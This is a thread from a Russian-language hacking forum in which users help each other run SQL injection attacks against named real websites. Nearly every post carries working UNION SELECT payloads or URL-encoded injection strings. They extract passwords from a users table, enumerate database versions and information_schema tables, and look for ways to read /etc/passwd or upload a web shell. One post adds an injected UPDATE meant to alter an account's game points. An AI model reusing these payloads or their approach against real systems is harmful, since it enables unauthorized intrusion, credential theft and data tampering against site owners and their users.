ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.11.2010, 19:15
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
используя такую конструкцию пытаюсь извлечь пассы
union select password,2,3,4,5,6,7,8,9,10 from users --
выводит 1 пасс
групконкат не работает
union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
ничего не выводит
почему так может происходить? Как правильно сделать запрос?
|
|
|
18.11.2010, 19:17
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от ALIM
ALIM said:
используя такую конструкцию пытаюсь извлечь пассы
union select password,2,3,4,5,6,7,8,9,10 from users --
выводит 1 пасс
групконкат не работает
union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
ничего не выводит
почему так может происходить? Как правильно сделать запрос?
union select password,2,3,4,5,6,7,8,9,10 from users where username='admin'--
|
|
|
|
18.11.2010, 22:34
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Здесь есть скуля?
http://www.diymtb.com.au/displayItems.asp?cid=14'
|
|
|
|
18.11.2010, 22:42
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
Здесь есть скуля? http://www.diymtb.com.au/displayItems.asp?cid=14'
http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
|
|
|
|
18.11.2010, 23:05
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от pinch
pinch said:
http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
Не могу вывести version(),database(),user(). Как это сделать?
|
|
|
|
18.11.2010, 23:56
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
Сообщение от FlaktW
Не могу вывести version(),database(),user(). Как это сделать?
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(v ersion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9, 10%23
p.s. не забудь +++ поставить я всетаки знаменитым хачу быть как Gorev...///=)))
|
|
|
|
19.11.2010, 17:14
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 12
Провел на форуме:
61047
Репутация:
1
|
|
Хм жаль беспокоить Как я могу загрузить оболочку здесь?
Код:
Code:
http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,17--
|
|
|
|
19.11.2010, 17:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
20602
Репутация:
0
|
|
моно ли тут прочитать etc/passwd?
http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
|
|
|
|
19.11.2010, 17:22
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Сообщение от None
Хм жаль беспокоить Как я могу загрузить оболочку здесь?
Через phpbb который там есть (по крайней мере есть таблица phpbb3_acl_users)
http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,group_concat%28table _name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+info rmation_schema.tables--
Админка (не форума http://www.vales.by/admin/login.php)
Сообщение от None
моно ли тут прочитать etc/passwd? http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
Прочитать, кажись нельзя, но залить шелл возможно получится:
http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,concat_ws%280x3a,table_name%2 9,4,5,6,7,8,9+from+information_schema.tables+--+
Есть несколько форумов и так далее....
|
|
|
|
19.11.2010, 18:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
10390
Репутация:
0
|
|
Привет Всем! Подскажите правильно я перевел этот код:
UPDATE dbo.Character SET AddPoint = AddPoint + 1
WHERE AccountID = 'login'
На вот этот:
'update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='login'
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
